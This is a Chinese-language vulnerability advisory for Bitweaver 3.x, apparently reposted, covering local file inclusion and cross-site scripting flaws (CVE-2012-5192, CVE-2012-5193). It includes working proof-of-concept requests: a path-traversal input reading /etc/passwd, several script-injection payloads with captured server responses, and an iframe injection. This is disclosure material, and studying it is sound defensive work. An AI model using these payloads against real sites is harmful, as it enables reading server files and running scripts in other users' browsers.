Bitweaver多个跨站脚本执行和本地文件包含漏洞

发布日期:2012-10-23
更新日期:2012-10-28

受影响系统:
Bitweaver Bitweaver 3.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56230
CVE ID: CVE-2012-5192,CVE-2012-5193

Bitweaver是免费的开源Web应用框架和内容管理系统。

Bitweaver 3.1及其他版本存在多个安全漏洞,攻击者可利用这些漏洞在受影响站点用户浏览器内执行任意脚本代码、窃取cookie身份验证凭证、在Web服务器进程中打开或运行任意文件。

1)通过"username" POST参数向users/remind_password.php传递的输入,"days" POST参数向stats/index.php传递的输入、"login" POST参数向users/register.php传递的输入没有正确过滤即被返回给用户。可被利用在受影响站点的用户浏览器中执行任意HTML和脚本代码。

2)通过"textarea_id" 参数向quicktags/special_chars.php传递的输入,"email" POST参数向users/register.php传递的输入没有正确过滤即被返回给用户。可被利用在受影响站点的用户浏览器中执行任意HTML和脚本代码。

<*来源:David Aaron
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192

The 'overlay_type' parameter in the 'gmap/view_overlay.php' page in
Bitweaver is vulnerable to a local file inclusion vulnerability.

This vulnerability can be demonstrated by traversing to a known readable
path on the web server file system.

Example:

Performing LFI on 'overlay_type' parameter

#Request

?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

#Response

root:x:0:0:root:/root:/bin/bash
<snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193

Multiple cross-site scripting (XSS) vulnerabilities have been discovered
that allow remote unauthenticated users to run arbitrary scripts on the
system.

Example:

The following Proof of Concepts illustrate that Bitweaver 2.8.1 is
vulnerable to XSS.

Example(s):

1. Performing XSS on stats/index.php

#Request

GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

2. Performing XSS on /newsletters/edition.php

#Request

GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

3. Performing XSS on the 'username' parameter available on /users/

#Request

POST /bitweaver/users/remind_password.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974
[truncated due to length]

<snip>
Invalid or unknown username: ">alert('XSS');</p></div>Please follow the instructions in the email.
<snip>

4. Performing XSS on the 'days' parameter on /stats/index.php

#Request

POST /bitweaver/stats/index.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778
[truncated due to length]

<snip>
<img src="https://www.linuxidc.com/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" />
<snip>

5. Performing XSS on the 'login' parameter on /users/register.php. (try
entering "><IFRAME src="https://www.trustwave.com"
width="1000px"> into the "Username field"):


6. Performing XSS on the 'highlight' parameter:

#Request

GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0

#Response

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyfzsg.html